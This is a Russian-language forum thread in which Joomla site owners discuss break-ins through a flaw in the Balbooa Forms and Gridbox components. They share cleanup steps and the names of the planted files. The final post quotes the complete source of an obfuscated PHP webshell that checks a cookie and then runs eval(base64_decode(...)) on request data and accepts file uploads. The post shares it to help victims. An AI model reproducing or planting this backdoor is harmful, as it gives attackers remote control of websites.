Компонент Balbooa Forms

может есть новая версия 2.4.2 (от 16 июля 2026 года)? В версии 2.4.0 была найдена серьезная уязвимость CVE-2026-56291 (Для просмотра ссылки Войди или Зарегистрируйся). Уже пару раз пришлось сайт восстанавливать, пока разобрался в чем дело и заблокировал запись в определенную папку
 
Последнее редактирование:
  • Нравится
Реакции: vada
может есть новая версия 2.4.2 (от 16 июля 2026 года)? В версии 2.4.0 была найдена серьезная уязвимость CVE-2026-56291 (Для просмотра ссылки Войди или Зарегистрируйся). Уже пару раз пришлось сайт восстанавливать, пока разобрался в чем дело и заблокировал запись в определенную папку
присоединяюсь к поиску актуальной версии. Подскажите пожалуйста как вы заблокировали запись в определенную папку? Что требуется сделать
 
присоединяюсь к поиску актуальной версии. Подскажите пожалуйста как вы заблокировали запись в определенную папку? Что требуется сделать
заблокировал запись в папку images/baforms/uploads/, то есть задал права на папку 444, сделать доступной только для чтения, конечно прежде удалил оттуда все, но пришлось поудалять еще троянов, да восстановить, то что удалили и поломали, в целом делов на полчаса, дольше всего сканирование антивирусником шло. Оставил пока так, пока не появится возможность обновить компонент. После этого уже пару недель как ничего не ломается и не добавляется
 
Последнее редактирование:
Присоединяюсь, поломали пару сайтов на разных хостингах. Школоло блин...... Оставили файлы с текстом "hacked by coupdegrace" и рассылали спам через скрипты. Возможно слили базы и файлы, но это не точно.... Посмотрел, есть конторы, которые по запросу "hacked by coupdegrace что это" - предлагают услугу очистки от вируса. Думаю это они и есть, сами проблему создали, сами её решили, цена вопроса на их сайте 10 тыс рубликов :))) хрен им... Пока заморозил сайты, изучаю изменения в файлах ,один сайт уже запустил. Самый простой вариант - отбекапится до даты первой "нулевого дня это ошибки". На месте разработчиков я бы позаботился о клиентах, фикс безопасности могли бы бесплатно сделать.

Кого взломали ищите файлики: router.phtml и scarworld.phtml - через них полный доступ к файлам сайта эти школоло имеют. У меня эти файлики лежали тут: адрес_сайта/public_html/templates/gridbox - прямо в этой папочке. И если зайти по этому пути с браузера, у нас открывается интерфейс с доступом :) так же залезли в раздел "пользователи" в админке Джумла - имейте ввиду, удалите лишних, включите двухфакторную авторизацию.!!!

заблокировал запись в папку images/baforms/uploads/, то есть задал права на папку 444, сделать доступной только для чтения, конечно прежде удалил оттуда все, но пришлось поудалять еще троянов, да восстановить, то что удалили и поломали, в целом делов на полчаса, дольше всего сканирование антивирусником шло. Оставил пока так, пока не появится возможность обновить компонент. После этого уже пару недель как ничего не ломается и не добавляется
Есть вариант, что этим не отделаться. Начал находить после этой же процедуры файлы в корне сайта. Которые содержат признаки HEUR:Backdoor.PHP.WebShell.gen - начали создавать пользователей в админке, то есть у них есть доступ к базе несмотря на то, что я включил двухфакторную авторизацию....пока не понимаю как это работает.

Резюмирую, в общем нифига не победил пока что... Продолжают создавать пользователей. Менял доступ к БД - менял пароль в админку, делал двуфакторную аутификацию, пока ничего не спасает. Ищу где инъекцию сделали...Хостер отмалчивается.

Ребята дополню, похоже дело не только в формах, но Screenshot_304.jpgи в Гридбоксе!! Приложил скрин. Нашел в базе имя файла который сгенерился с свредоновом. Пок не понял откуда ноги растут....

Вот еще скрин.Screenshot_305.jpg

Содержимое файла такое : <?php //echo 409723*20;if(md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>
- то есть я так понял открывая страницу пользоавтель запускал пхп файл.
 
Последнее редактирование:
Назад
Сверху